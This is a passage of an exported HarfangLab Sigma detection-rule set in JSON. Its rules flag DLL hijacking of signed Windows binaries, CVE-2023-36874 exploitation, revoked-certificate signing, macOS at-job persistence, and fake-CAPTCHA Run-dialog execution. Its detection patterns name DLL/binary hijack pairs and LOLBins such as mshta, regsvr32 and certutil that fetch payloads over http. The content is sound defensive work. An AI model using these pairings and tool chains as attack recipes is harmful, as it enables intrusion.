"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588153Z",
"creation_date": "2026-03-23T11:45:34.588157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588165Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_label.yml",
"content": "title: DLL Hijacking via label.exe\nid: 0a4bf049-476a-4f76-b1ff-c92e630ba3ea\ndescription: |\n Detects potential Windows DLL Hijacking via label.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'label.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
"rule_name": "DLL Hijacking via label.exe",
"rule_description": "Detects potential Windows DLL Hijacking via label.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591044Z",
"creation_date": "2026-03-23T11:45:34.591047Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591055Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdsched.yml",
"content": "title: DLL Hijacking via mdsched.exe\nid: 0a708087-9ef8-4db8-b5a9-84d30391d776\ndescription: |\n Detects potential Windows DLL Hijacking via mdsched.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdsched.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\bcd.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
"rule_name": "DLL Hijacking via mdsched.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdsched.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609800Z",
"creation_date": "2026-03-23T11:45:34.609803Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609811Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_wer_service_vulnerability.yml",
"content": "title: WER Service CVE-2023-36874 Vulnerability Exploited\nid: 0a956b02-3359-4969-9418-cfa7e8279f9e\ndescription: |\n Detects exploitation of CVE-2023-36874, a vulnerability affecting the Windows Error Reporting (WER) component.\n Microsoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate privileges to SYSTEM.\n It is recommended to investigate whether the exploitation was successful by looking at the integrity level of the process that triggered the alert.\nreferences:\n - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/08/24\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-36874\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-36874\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n # C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wercplsupport\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'wercplsupport'\n\n filter_signed:\n OriginalFileName: 'WerMgr'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
"rule_name": "WER Service CVE-2023-36874 Vulnerability Exploited",
"rule_description": "Detects exploitation of CVE-2023-36874, a vulnerability affecting the Windows Error Reporting (WER) component.\nMicrosoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate privileges to SYSTEM.\nIt is recommended to investigate whether the exploitation was successful by looking at the integrity level of the process that triggered the alert.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088105Z",
"creation_date": "2026-03-23T11:45:34.088107Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088111Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_dicol_effluent_revoked_certificate.yml",
"content": "title: Process Executed Signed with Revoked Certificate\nid: 0a95ac1e-214e-4581-b19e-5ba1e9731861\ndescription: |\n Detects the execution of a process signed using a revoked DICOL EFFLUENT certificate.\n Malicious use of this certificate by the threat actor UNC2596 has already been observed.\n It is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\nreferences:\n - https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/09/27\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '3e22bfc34b0718ee1416cc5bf1f7b2b646f5b56a'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
"rule_name": "Process Executed Signed with Revoked Certificate",
"rule_description": "Detects the execution of a process signed using a revoked DICOL EFFLUENT certificate.\nMalicious use of this certificate by the threat actor UNC2596 has already been observed.\nIt is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623495Z",
"creation_date": "2026-03-23T11:45:34.623497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1204_001_run_command_explorer.yml",
"content": "title: Suspicious Process Executed via Run Prompt\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee\ndescription: |\n Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\n In this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\n It is recommended to investigate the entire process chain following any suspicious Run dialog executions.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/11/12\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|re: '(?i).*\\|.:\\\\Windows\\\\System32\\\\user32\\.dll!SendMessageW\\+0x[a-f0-9]*$'\n StackTrace|contains:\n - 'CallWindowProcW'\n - 'DispatchMessageW'\n ParentImage|endswith: '\\explorer.exe'\n Image|startswith: '?:\\windows\\'\n # Ensure commandline containes at least a space -> there are some args\n 
CommandLine|contains: ' '\n\n selection_image:\n - Image:\n - '?:\\Windows\\hh.exe'\n - '?:\\Windows\\System32\\mshta.exe'\n - '?:\\Windows\\SysWOW64\\mshta.exe'\n - '?:\\Windows\\System32\\PresentationHost.exe'\n - '?:\\Windows\\SysWOW64\\PresentationHost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\windows\\system32\\regsvr32.exe'\n - '?:\\windows\\SysWOW64\\regsvr32.exe'\n - '?:\\windows\\system32\\rundll32.exe'\n - '?:\\windows\\SysWOW64\\rundll32.exe'\n CommandLine|contains: 'http'\n\n selection_cmd:\n Image:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n CommandLine|contains:\n - 'mshta'\n - 'PresentationHost'\n - 'powershell'\n - 'msiexec'\n - 'regsvr32'\n - 'rundll32'\n - 'curl'\n - 'certutil'\n\n filter_lnk:\n LnkPath|contains: '?'\n\n exclusion_powershell:\n CommandLine:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -noprofile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process PowerShell -Verb RunAs'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -File ?:\\\\*\\Scripts\\\\*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process notepad.exe *'\n\n exclusion_msiexec:\n CommandLine|startswith: '?:\\Windows\\system32\\msiexec.exe /* \\\\\\\\*.local\\'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
"rule_name": "Suspicious Process Executed via Run Prompt",
"rule_description": "Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\nIn this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\nIt is recommended to investigate the entire process chain following any suspicious Run dialog executions.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093337Z",
"creation_date": "2026-03-23T11:45:34.093339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_at_scheduler_enabled.yml",
"content": "title: At Jobs Enabled via Launchd\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5\ndescription: |\n Detects the loading of a file related to the `at` utility by launchd.\n Adversaries may use `at` to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/05/10\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/launchctl'\n CommandLine|contains|all:\n - 'load'\n - '/com.apple.atrun.plist'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
"rule_name": "At Jobs Enabled via Launchd",
"rule_description": "Detects the loading of a file related to the `at` utility by launchd.\nAdversaries may use `at` to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599572Z",
"creation_date": "2026-03-23T11:45:34.599576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599583Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cidiag.yml",
"content": "title: DLL Hijacking via CIDiag.exe\nid: 0ac5fafe-dc2c-42bf-9d26-3882b0df7857\ndescription: |\n Detects potential Windows DLL Hijacking via CIDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CIDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
"rule_name": "DLL Hijacking via CIDiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CIDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618712Z",
"creation_date": "2026-03-23T11:45:34.618714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618718Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_workfolders.yml",
"content": "title: DLL Hijacking via workfolders.exe\nid: 0ad1a87e-1efd-47a3-a74b-3ec148f9992a\ndescription: |\n Detects potential Windows DLL Hijacking via workfolders.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - 